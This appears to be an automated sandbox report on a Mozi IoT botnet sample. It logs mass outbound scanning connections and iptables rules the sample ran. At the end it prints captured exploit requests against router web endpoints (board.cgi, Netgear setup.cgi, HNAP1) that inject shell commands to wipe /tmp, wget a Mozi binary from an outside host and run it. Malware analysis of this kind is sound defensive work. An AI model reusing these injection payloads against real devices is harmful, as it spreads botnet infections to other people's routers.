                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 24.215.67.187:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 210.154.24.34:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 222.173.140.56:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 208.199.224.144:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 73.60.79.97:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 176.0.3.121:1023
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 122.154.248.225:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 141.129.165.140:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 20.211.127.177:2323
                            Source: global trafficTCP traffic: 192.168.2.23:58394 -> 29.209.111.194:7574
                            Source: global trafficTCP traffic: 192.168.2.23:53144 -> 114.166.82.50:8443
                            Source: global trafficTCP traffic: 192.168.2.23:58366 -> 167.177.237.132:5555
                            Source: global trafficTCP traffic: 192.168.2.23:43632 -> 11.152.97.248:49152
                            Source: global trafficTCP traffic: 192.168.2.23:38888 -> 155.238.237.234:81
                            Source: global trafficTCP traffic: 192.168.2.23:44158 -> 54.131.251.102:8080
                            Source: global trafficTCP traffic: 192.168.2.23:59094 -> 3.202.168.193:8080
                            Source: global trafficTCP traffic: 192.168.2.23:35100 -> 161.191.205.75:37215
                            Source: global trafficTCP traffic: 192.168.2.23:43678 -> 1.156.155.220:5555
                            Source: global trafficTCP traffic: 192.168.2.23:40186 -> 222.75.43.46:37215
                            Source: global trafficTCP traffic: 192.168.2.23:54426 -> 75.192.234.161:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51818 -> 67.29.195.217:8443
                            Source: global trafficTCP traffic: 192.168.2.23:39344 -> 164.60.72.134:7574
                            Source: global trafficTCP traffic: 192.168.2.23:49166 -> 177.171.143.161:37215
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 197.225.9.184:1023
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 188.105.217.199:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 146.130.174.139:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 117.197.126.25:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 109.235.162.123:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 107.91.238.166:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 74.198.32.241:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 158.228.81.14:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 126.153.174.206:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 77.158.62.78:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 207.127.47.177:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 179.10.120.67:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 166.206.86.98:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 155.242.36.127:1023
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 80.159.60.8:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 168.60.7.52:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 4.226.128.18:2323
                            Source: global trafficTCP traffic: 192.168.2.23:40432 -> 198.74.93.127:81
                            Source: global trafficTCP traffic: 192.168.2.23:35642 -> 59.92.247.206:52869
                            Source: global trafficTCP traffic: 192.168.2.23:56766 -> 148.104.170.209:8080
                            Source: global trafficTCP traffic: 192.168.2.23:40856 -> 23.210.109.40:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55034 -> 169.30.77.109:37215
                            Source: global trafficTCP traffic: 192.168.2.23:44648 -> 87.32.48.189:8443
                            Source: global trafficTCP traffic: 192.168.2.23:53672 -> 58.49.123.103:81
                            Source: global trafficTCP traffic: 192.168.2.23:60892 -> 45.153.216.8:52869
                            Source: global trafficTCP traffic: 192.168.2.23:55552 -> 109.171.62.170:8080
                            Source: global trafficTCP traffic: 192.168.2.23:44506 -> 26.22.241.69:81
                            Source: global trafficTCP traffic: 192.168.2.23:35442 -> 145.145.175.50:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34732 -> 198.246.28.145:5555
                            Source: global trafficTCP traffic: 192.168.2.23:48460 -> 135.51.122.231:8443
                            Source: global trafficTCP traffic: 192.168.2.23:50818 -> 13.209.203.228:37215
                            Source: global trafficTCP traffic: 192.168.2.23:57210 -> 142.213.93.241:8443
                            Source: global trafficTCP traffic: 192.168.2.23:57392 -> 168.22.178.161:8080
                            Source: global trafficTCP traffic: 192.168.2.23:37838 -> 68.182.174.204:8080
                            Source: global trafficTCP traffic: 192.168.2.23:59820 -> 159.112.33.196:8443
                            Source: global trafficTCP traffic: 192.168.2.23:60202 -> 169.70.235.203:8080
                            Source: global trafficTCP traffic: 192.168.2.23:41488 -> 28.130.196.141:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45100 -> 92.27.66.191:8443
                            Source: global trafficTCP traffic: 192.168.2.23:42212 -> 53.169.246.148:52869
                            Source: global trafficTCP traffic: 192.168.2.23:34504 -> 203.246.201.178:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39800 -> 205.55.79.236:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53802 -> 45.210.95.218:8080
                            Source: global trafficTCP traffic: 192.168.2.23:35700 -> 115.248.197.146:7574
                            Source: global trafficTCP traffic: 192.168.2.23:58998 -> 222.31.51.54:49152
                            Source: global trafficTCP traffic: 192.168.2.23:36728 -> 60.31.41.49:7574
                            Source: global trafficTCP traffic: 192.168.2.23:38448 -> 71.132.127.112:8443
                            Source: global trafficTCP traffic: 192.168.2.23:50478 -> 49.122.11.82:5555
                            Source: global trafficTCP traffic: 192.168.2.23:49424 -> 195.121.56.192:37215
                            Source: global trafficTCP traffic: 192.168.2.23:39332 -> 196.110.129.112:37215
                            Source: global trafficTCP traffic: 192.168.2.23:50158 -> 220.74.77.186:49152
                            Source: global trafficTCP traffic: 192.168.2.23:34198 -> 183.170.83.140:81
                            Source: global trafficTCP traffic: 192.168.2.23:52956 -> 34.155.65.192:8080
                            Source: global trafficTCP traffic: 192.168.2.23:35404 -> 31.125.159.69:8080
                            Source: global trafficTCP traffic: 192.168.2.23:35798 -> 206.100.116.9:8443
                            Source: global trafficTCP traffic: 192.168.2.23:33070 -> 216.243.102.141:37215
                            Source: global trafficTCP traffic: 192.168.2.23:33420 -> 209.95.98.5:52869
                            Source: global trafficTCP traffic: 192.168.2.23:45430 -> 1.146.114.34:52869
                            Source: global trafficTCP traffic: 192.168.2.23:47912 -> 107.123.240.5:52869
                            Source: global trafficTCP traffic: 192.168.2.23:54536 -> 48.84.204.236:7574
                            Source: global trafficTCP traffic: 192.168.2.23:49348 -> 221.168.65.137:81
                            Source: global trafficTCP traffic: 192.168.2.23:40464 -> 174.191.244.5:8080
                            Source: global trafficTCP traffic: 192.168.2.23:59620 -> 104.228.111.14:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50832 -> 113.213.180.153:52869
                            Source: global trafficTCP traffic: 192.168.2.23:35664 -> 202.218.205.135:37215
                            Source: global trafficTCP traffic: 192.168.2.23:35390 -> 51.78.208.9:7574
                            Source: global trafficTCP traffic: 192.168.2.23:60738 -> 171.18.70.194:5555
                            Source: global trafficTCP traffic: 192.168.2.23:59778 -> 33.214.128.25:8443
                            Source: global trafficTCP traffic: 192.168.2.23:38914 -> 179.129.124.12:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45496 -> 129.156.24.205:81
                            Source: global trafficTCP traffic: 192.168.2.23:53960 -> 117.138.201.233:8080
                            Source: global trafficTCP traffic: 192.168.2.23:49254 -> 21.58.30.238:7574
                            Source: global trafficTCP traffic: 192.168.2.23:46104 -> 167.95.195.48:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51516 -> 123.85.144.247:49152
                            Source: global trafficTCP traffic: 192.168.2.23:56064 -> 131.11.250.52:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43882 -> 152.54.88.1:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43780 -> 45.7.188.235:5555
                            Source: global trafficTCP traffic: 192.168.2.23:35810 -> 19.207.169.63:8080
                            Source: global trafficTCP traffic: 192.168.2.23:46800 -> 116.50.214.170:49152
                            Source: global trafficTCP traffic: 192.168.2.23:42766 -> 35.73.130.33:37215
                            Source: global trafficTCP traffic: 192.168.2.23:52874 -> 115.176.251.133:7574
                            Source: global trafficTCP traffic: 192.168.2.23:46072 -> 128.27.58.131:37215
                            Source: global trafficTCP traffic: 192.168.2.23:48000 -> 160.10.52.39:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55766 -> 27.155.160.77:8080
                            Source: global trafficTCP traffic: 192.168.2.23:56104 -> 216.87.48.175:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53116 -> 105.183.55.212:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39358 -> 137.11.27.138:37215
                            Source: global trafficTCP traffic: 192.168.2.23:43712 -> 220.37.202.8:49152
                            Source: global trafficTCP traffic: 192.168.2.23:39954 -> 76.56.4.87:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54614 -> 6.130.70.88:49152
                            Source: global trafficTCP traffic: 192.168.2.23:43036 -> 94.45.13.4:37215
                            Source: global trafficTCP traffic: 192.168.2.23:44084 -> 174.243.22.77:37215
                            Source: global trafficTCP traffic: 192.168.2.23:39240 -> 210.227.250.180:8080
                            Source: global trafficTCP traffic: 192.168.2.23:56190 -> 199.246.29.37:8080
                            Source: global trafficTCP traffic: 192.168.2.23:50222 -> 189.118.208.52:5555
                            Source: global trafficTCP traffic: 192.168.2.23:40594 -> 70.176.1.46:37215
                            Source: global trafficTCP traffic: 192.168.2.23:46048 -> 206.101.86.38:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43522 -> 53.240.59.231:8443
                            Source: global trafficTCP traffic: 192.168.2.23:43694 -> 155.188.212.116:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34386 -> 19.62.64.141:37215
                            Source: global trafficTCP traffic: 192.168.2.23:35982 -> 153.158.173.169:49152
                            Source: global trafficTCP traffic: 192.168.2.23:44878 -> 47.227.87.189:49152
                            Source: global trafficTCP traffic: 192.168.2.23:57188 -> 90.16.121.147:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34398 -> 222.180.230.186:49152
                            Source: global trafficTCP traffic: 192.168.2.23:43264 -> 217.185.174.89:5555
                            Source: global trafficTCP traffic: 192.168.2.23:53016 -> 47.219.98.220:52869
                            Source: global trafficTCP traffic: 192.168.2.23:44902 -> 38.94.214.104:8080
                            Source: global trafficTCP traffic: 192.168.2.23:48472 -> 72.196.245.40:5555
                            Source: global trafficTCP traffic: 192.168.2.23:47070 -> 30.145.58.15:52869
                            Source: global trafficTCP traffic: 192.168.2.23:46460 -> 131.244.225.102:52869
                            Source: global trafficTCP traffic: 192.168.2.23:43570 -> 104.181.12.16:7574
                            Source: global trafficTCP traffic: 192.168.2.23:53070 -> 116.253.15.39:8443
                            Source: global trafficTCP traffic: 192.168.2.23:58478 -> 170.154.175.226:8080
                            Source: global trafficTCP traffic: 192.168.2.23:56370 -> 59.20.84.73:8443
                            Source: global trafficTCP traffic: 192.168.2.23:33282 -> 79.53.40.110:37215
                            Source: global trafficTCP traffic: 192.168.2.23:38414 -> 102.243.141.168:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54622 -> 65.241.114.10:49152
                            Source: global trafficTCP traffic: 192.168.2.23:44182 -> 47.54.222.151:8080
                            Source: global trafficTCP traffic: 192.168.2.23:38126 -> 113.43.66.2:8080
                            Source: global trafficTCP traffic: 192.168.2.23:56536 -> 216.226.126.11:8443
                            Source: global trafficTCP traffic: 192.168.2.23:36022 -> 129.13.37.109:81
                            Source: global trafficTCP traffic: 192.168.2.23:48590 -> 11.199.251.112:49152
                            Source: global trafficTCP traffic: 192.168.2.23:40310 -> 112.161.2.88:37215
                            Source: global trafficTCP traffic: 192.168.2.23:55104 -> 45.126.212.86:8443
                            Source: global trafficTCP traffic: 192.168.2.23:33048 -> 48.117.193.34:8080
                            Source: global trafficTCP traffic: 192.168.2.23:59994 -> 165.209.139.40:52869
                            Source: global trafficTCP traffic: 192.168.2.23:37148 -> 93.127.201.166:8080
                            Source: global trafficTCP traffic: 192.168.2.23:52688 -> 137.242.182.194:8080
                            Source: global trafficTCP traffic: 192.168.2.23:40728 -> 88.238.152.125:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58554 -> 160.49.80.179:52869
                            Source: global trafficTCP traffic: 192.168.2.23:38878 -> 67.161.75.116:81
                            Source: global trafficTCP traffic: 192.168.2.23:42974 -> 137.20.185.147:8443
                            Source: global trafficTCP traffic: 192.168.2.23:58830 -> 17.117.40.99:81
                            Source: global trafficTCP traffic: 192.168.2.23:43964 -> 214.67.240.111:37215
                            Source: global trafficTCP traffic: 192.168.2.23:42762 -> 115.67.171.112:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53152 -> 80.171.126.29:49152
                            Source: global trafficTCP traffic: 192.168.2.23:38672 -> 19.99.0.75:52869
                            Source: global trafficTCP traffic: 192.168.2.23:43906 -> 5.176.45.173:49152
                            Source: global trafficTCP traffic: 192.168.2.23:34274 -> 159.76.112.188:81
                            Source: global trafficTCP traffic: 192.168.2.23:50670 -> 150.84.103.83:37215
                            Source: global trafficTCP traffic: 192.168.2.23:47430 -> 185.132.62.107:8080
                            Source: global trafficTCP traffic: 192.168.2.23:52068 -> 79.28.180.59:52869
                            Source: global trafficTCP traffic: 192.168.2.23:39030 -> 132.242.35.118:8443
                            Source: global trafficTCP traffic: 192.168.2.23:55826 -> 136.244.168.161:5555
                            Source: global trafficTCP traffic: 192.168.2.23:40118 -> 13.222.144.6:8443
                            Source: global trafficTCP traffic: 192.168.2.23:45944 -> 156.233.225.157:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60546 -> 191.152.135.201:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58080 -> 221.50.187.178:49152
                            Source: global trafficTCP traffic: 192.168.2.23:43052 -> 97.218.108.192:5555
                            Source: global trafficTCP traffic: 192.168.2.23:35326 -> 109.1.35.229:8443
                            Source: global trafficTCP traffic: 192.168.2.23:52260 -> 141.228.135.142:7574
                            Source: global trafficTCP traffic: 192.168.2.23:53504 -> 177.23.125.155:81
                            Source: global trafficTCP traffic: 192.168.2.23:60212 -> 102.183.168.190:5555
                            Source: global trafficTCP traffic: 192.168.2.23:47490 -> 198.204.234.167:81
                            Source: global trafficTCP traffic: 192.168.2.23:44680 -> 86.223.164.204:8443
                            Source: global trafficTCP traffic: 192.168.2.23:59710 -> 176.129.63.174:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47872 -> 157.65.160.237:7574
                            Source: global trafficTCP traffic: 192.168.2.23:34992 -> 13.5.228.68:8080
                            Source: global trafficTCP traffic: 192.168.2.23:33010 -> 122.111.230.144:81
                            Source: global trafficTCP traffic: 192.168.2.23:34624 -> 218.216.106.153:49152
                            Source: global trafficTCP traffic: 192.168.2.23:57636 -> 19.148.27.162:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47318 -> 82.92.160.32:81
                            Source: global trafficTCP traffic: 192.168.2.23:37758 -> 4.33.109.123:8080
                            Source: global trafficTCP traffic: 192.168.2.23:49140 -> 182.225.227.232:52869
                            Source: global trafficTCP traffic: 192.168.2.23:41742 -> 139.126.200.221:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53444 -> 61.219.168.25:49152
                            Source: global trafficTCP traffic: 192.168.2.23:34124 -> 214.179.110.36:52869
                            Source: global trafficTCP traffic: 192.168.2.23:43744 -> 128.120.223.143:37215
                            Source: global trafficTCP traffic: 192.168.2.23:33794 -> 145.241.115.127:52869
                            Source: global trafficTCP traffic: 192.168.2.23:36794 -> 4.241.28.42:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57864 -> 2.57.120.199:37215
                            Source: global trafficTCP traffic: 192.168.2.23:46108 -> 211.91.199.166:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60048 -> 140.25.22.34:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60022 -> 220.186.66.237:8443
                            Source: global trafficTCP traffic: 192.168.2.23:56956 -> 34.70.187.128:8080
                            Source: global trafficTCP traffic: 192.168.2.23:46356 -> 92.45.169.28:7574
                            Source: global trafficTCP traffic: 192.168.2.23:35080 -> 18.46.148.55:8443
                            Source: global trafficTCP traffic: 192.168.2.23:53870 -> 89.35.238.39:52869
                            Source: global trafficTCP traffic: 192.168.2.23:38240 -> 91.150.21.151:52869
                            Source: global trafficTCP traffic: 192.168.2.23:49164 -> 153.141.84.168:81
                            Source: global trafficTCP traffic: 192.168.2.23:34410 -> 45.185.70.100:8443
                            Source: global trafficTCP traffic: 192.168.2.23:52762 -> 115.50.227.165:8080
                            Source: global trafficTCP traffic: 192.168.2.23:36330 -> 80.227.147.152:81
                            Source: global trafficTCP traffic: 192.168.2.23:52956 -> 49.74.230.150:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53422 -> 97.4.184.157:7574
                            Source: global trafficTCP traffic: 192.168.2.23:40282 -> 171.80.249.252:37215
                            Source: global trafficTCP traffic: 192.168.2.23:56162 -> 204.148.72.50:8080
                            Source: global trafficTCP traffic: 192.168.2.23:49998 -> 175.239.142.242:49152
                            Source: global trafficTCP traffic: 192.168.2.23:37822 -> 177.122.6.73:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55292 -> 188.206.66.2:52869
                            Source: global trafficTCP traffic: 192.168.2.23:32998 -> 183.10.226.229:37215
                            Source: global trafficTCP traffic: 192.168.2.23:36254 -> 186.73.136.18:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57580 -> 216.234.214.243:37215
                            Source: global trafficTCP traffic: 192.168.2.23:54212 -> 157.99.17.233:49152
                            Source: global trafficTCP traffic: 192.168.2.23:43310 -> 85.151.170.165:81
                            Source: global trafficTCP traffic: 192.168.2.23:45352 -> 158.249.180.11:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34030 -> 153.223.215.107:52869
                            Source: global trafficTCP traffic: 192.168.2.23:40350 -> 24.139.219.73:52869
                            Source: global trafficTCP traffic: 192.168.2.23:47940 -> 108.101.101.73:7574
                            Source: global trafficTCP traffic: 192.168.2.23:56528 -> 31.78.106.128:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55052 -> 100.145.48.147:8443
                            Source: global trafficTCP traffic: 192.168.2.23:36788 -> 81.14.183.229:8080
                            Source: global trafficTCP traffic: 192.168.2.23:48320 -> 95.187.185.8:37215
                            Source: global trafficTCP traffic: 192.168.2.23:56468 -> 133.86.189.70:5555
                            Source: global trafficTCP traffic: 192.168.2.23:44310 -> 191.118.66.148:8080
                            Source: global trafficTCP traffic: 192.168.2.23:50746 -> 117.194.49.127:8080
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 120.2.17.138:1023
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 74.15.218.181:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 194.203.244.127:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 155.101.32.46:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 34.157.222.50:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 211.22.193.174:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 222.225.161.61:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 149.11.244.44:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 115.68.73.58:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 23.127.153.195:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 213.187.19.174:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 161.54.76.198:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 113.52.179.249:1023
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 8.146.63.176:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 91.70.99.174:2323
                            Source: global trafficTCP traffic: 192.168.2.23:10200 -> 78.7.207.203:2323
                            Source: global trafficTCP traffic: 192.168.2.23:54848 -> 61.44.101.4:81
                            Source: /bin/sh (PID: 6286)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6300)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6305)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6311)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6317)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6320)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6323)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6333)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6337)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6342)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6373)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6376)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6382)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6388)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6394)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6400)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6406)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6412)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6418)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6423)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6430)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6436)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6443)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6448)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6456)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6459)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6462)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6465)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6468)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6474)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28674 -j ACCEPTJump to behavior
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 202.152.121.18:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
